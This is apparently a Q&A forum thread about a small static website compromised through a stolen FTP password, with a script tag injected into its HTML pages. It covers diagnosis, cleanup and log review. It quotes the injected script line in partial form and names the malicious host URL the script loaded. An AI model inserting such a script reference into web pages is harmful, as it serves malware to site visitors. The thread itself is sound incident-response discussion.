views:

119

answers:

2

Hello,

My friend has a web site on ovh.com.Since a couple of days, the site is flagged as dangerous by google.

I had a look in the files (the site only contains only html, css, pjg) and it appears that a new line of code:

<script>http://...page.php&lt;/script&gt;&lt;/body&gt;

(I do not remember the exact url) has been added in some of the html pages. This is obviously a virus that would be run when the page is displayed.

If I delete this line and scan the file once again this is fine.

How could this be added to a file on the server ? Is there something to do to prevent such things ? (thinking about .htaccess stuff or else). I do not see how the ftp identifiants could have been stolen so for me this code insertion must come from somewhere else.

Could you please help ?

Thanks a lot,

Luc

+1  A: 
  1. Are you using a shared hosting? Your provider did not consider enough measures that customers do not have access to other's account.
  2. Is your password easy to guess?
  3. Any change in .htaccess will not help
Ankit Jain
hello, yes share hosting. Password not easy to guess at all. Even a new folder have been added in the directory structure.
Luc
+5  A: 

This likely isn't a hack in the terms that you're thinking of. Shared hosting isn't usually the problem....and it's unlikely that someone guessed your password. Not knowing details, I'd bet that somewhere on the account you have a piece of open source software such as Joomla, phpBB, Wordpress, or similar. I'd also bet that this piece of software has not been updated in a while.

This is fairly common. Hackers find vulnerable scripts and crawl the web "sniffing" for particular versions of code that they can use to gain access to your site. Several jobs ago, a russian porn operation got into my company's website via a rogue install of phpBB that an employee has snuck on the server. Via this vulnerable code, they injected thousands of files and even gained access to the database by creating a new "superadmin" with all privileges. Needless to say, it was a mess to clean up. A similar issue happened to an account that I used for testing purposes: an old version of Joomla allowed the user to script inject gibberish-looking javascript that attempted to install a virus via the user's browser, and also caused the error screen your describing in Chrome. My current company's production site sees hundreds of attempts to exploit phpMyAdmin each day in the logs, which is why we've stopped using it.

So, now what? First, take your site down for a bit to protect others....take the opportunity to change db and ftp passwords. Second, analyze what's out there....blast any unused code, update open-source scripts. Make sure software passwords aren't left in the default state, because the hackers know them (ever wonder how most WiFi is hacked?) Then, the not-so-fun part....dig through pages to clean up injected code. Find and replace or GREP can help speed this part....but be careful to get it all out or they might have a way to get back in. In the case of my personal site, it took 2 go-arounds to completely get the site locked down and cleaned up. The good news here is that most of these attacks are automated, so the injected code is pretty obvious and almost always in the same location and using the similar syntax from page to page. Also, be aware that some of these attacks host files on your server, so scrutinize files to make sure they're legit.

Finally, analyze your own code to see if you've left any holes. Login scripts, fwrites, and even queries can be targets for injection. Be careful what you open yourself up to.

bpeterson76
HEllo, thanks for your long reponse. In fact, there are no open source pieces in the pictures. My friends only created a couple of html page and css, and add a couple of jpg files. I was wondering if something like Joomla could make the think more secure but I think that would be too much for my friend's needs. I have checked the code of the html pages and saw the line that was added by (probably) a robot. I can clean this up quite easily but I guess it will be the same thing tomorrow morning :( I'll check for forms or thing like that but I'm pretty sure there are none. Thanks a lot.
Luc
is there a chance you could post the URL? We could probably help you figure it out a little easier. Understand if you'd like to keep it private though...
bpeterson76
Actually, the other thing is if you don't have any obvious glaring holes in your code, you might contact the hosting to monitor the activity on the site. You could also do this yourself with analytics if it's installed. At the least, it'll tell you what pages people are accessing so that you can analyze for holes. Who knows, maybe they're back-dooring the site through something you don't even control.
bpeterson76
yes, the site is piccadillysbulls.com . Is it be possible that some apache vulnabilities were exploited and that all the sites on this share host be hacked also ? Can it be something else ? Thanks a lot for your help.
Luc
Luc, there's nothing there that's obvious besides the link to gawalisamaj.org/res/page.php You could take a look at the modification date for the file, compare it to the apache access log, and at least have an idea where its coming from. Perhaps the order that that particular user modified files could tell the story. Also, logs might tell you what method they are using to get in if its via ftp or http. Some analytics programs can show paths through sites--see if your host offers anything like that. Bottom line, time to get the host involved...this isn't a great thing.
bpeterson76
hi, thanks for your help, I will check with the host then :(. I really appreciate your help. I keep you informed :)
Luc
Hell, so just to close the question, you were right in the way that in fact the ftp password were stolen, I would say sniffed on the network. I had a llok at the ftp log an saw some upload in the middle of the night when this should not happen. Those upload were in a folder created at the same time. As ftp do not encrypt the password that obvioulsy a problem. Thanks a lot for your valuable comments. Best Regards, Luc
Luc
You're right, it was either that your FTP password was sniffed over the network or one of your pc's that held the ftp password(stored in a code editor with built-in FTP program or the ftp program itself.)
DMin